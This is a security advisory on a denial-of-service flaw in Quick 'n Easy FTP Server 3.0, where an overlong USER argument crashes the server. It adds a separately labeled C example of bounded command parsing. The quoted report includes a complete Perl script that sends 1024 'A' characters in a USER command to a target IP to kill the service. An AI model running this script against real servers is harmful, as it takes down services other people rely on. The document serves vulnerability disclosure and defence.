SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   Quick 'n Easy FTP Server
Vendors:   Pablo Software Solutions
Quick 'n Easy FTP Server Input Validation Bug in USER Command Lets Remote Users Deny Service
SecurityTracker Alert ID:  1014615
SecurityTracker URL:  http://securitytracker.com/id/1014615
CVE Reference:   CVE-2005-2479
Updated:  Jun 8 2008
Original Entry Date:  Aug 3 2005
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 3.0
Description:   A vulnerability was reported in Quick 'n Easy FTP Server. A remote user can crash the FTP service.

The FTP service does not properly validate user-supplied commands. A remote user can supply a specially crafted USER command argument of approximately 1024 characters to cause the target FTP service to crash.

matiteman reported this vulnerability.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.
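
The input validation that the description says is missing can be sketched as follows. This is an added example, not code from the vendor or from the original report: the function name parse_ftp_line, the struct ftp_cmd and the limits MAX_LINE and MAX_ARG are assumptions chosen for illustration. It bounds the whole control-channel line and the argument before anything is copied, and returns an FTP error reply code instead of processing an oversized USER argument.

```c
/* Added example: bounded parsing of one FTP control-channel line.
 * MAX_LINE and MAX_ARG are assumed limits, not values from the vendor. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_LINE 512   /* assumed cap on a whole command line, CRLF included */
#define MAX_ARG  255   /* assumed cap on one argument such as a user name */

struct ftp_cmd {
    char verb[5];            /* up to 4 letters, upper-cased, NUL-terminated */
    char arg[MAX_ARG + 1];   /* argument copy, NUL-terminated */
};

/* Returns 0 on success, or the FTP reply code to send instead of
 * processing the line: 500 (syntax error) or 501 (bad argument). */
int parse_ftp_line(const char *line, size_t len, struct ftp_cmd *out)
{
    size_t i = 0, vlen = 0, alen;

    memset(out, 0, sizeof *out);
    if (len < 2 || len > MAX_LINE) return 500;            /* reject before copying */
    if (line[len - 2] != '\r' || line[len - 1] != '\n') return 500;
    len -= 2;                                             /* drop CRLF */

    while (i < len && line[i] != ' ') {                   /* verb: 3-4 letters */
        if (vlen == 4 || !isalpha((unsigned char)line[i])) return 500;
        out->verb[vlen++] = (char)toupper((unsigned char)line[i++]);
    }
    if (vlen < 3) return 500;
    if (i < len) i++;                                     /* skip the single space */

    alen = len - i;
    if (alen > MAX_ARG) return 501;                       /* length checked first */
    for (size_t k = 0; k < alen; k++) {                   /* no control bytes or NUL */
        unsigned char c = (unsigned char)line[i + k];
        if (c < 0x20 || c == 0x7f) return 501;
    }
    memcpy(out->arg, line + i, alen);                     /* alen <= MAX_ARG */
    if (strcmp(out->verb, "USER") == 0 && alen == 0) return 501;
    return 0;
}
```

The caller is expected to read at most MAX_LINE bytes per line from the socket and to close or resynchronise the session when a line exceeds that, so that no unbounded buffer is ever filled.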


 Source Message Contents

Subject:  Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow

Details:
========

Input to the user commands is not properly checked and/or filtered. Issuing a long argument to the user (about 1024 characters) commands will cause the corresponding process to die without any error message.

This vulnerability exists in both the professional version 3.0 and lite version 3.0.



Exploits:
========

Run the following PERL script against the server. The corresponding process will die.



#=====testserver.pl =====
#
# Usage: testserver.pl <ip>
# testserver.pl 127.0.0.1
# bug discovered by : matiteman
# exploit coded by : matiteman
# thanks to : Reed Arvin (peachfuzz)
# Quick 'n Easy FTP Server 3.0 (pro and lite)
# Download:
# http://www.pablosoftwaresolutions.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto => "TCP"))
{
    print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";

    sleep(1);

    print $socket "user " . "A" x 1024 . "\r\n";

    sleep(1);

    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:21\n";
}
#===== testserver.pl =====

 
 



Copyright 2019, SecurityGlobal.net LLC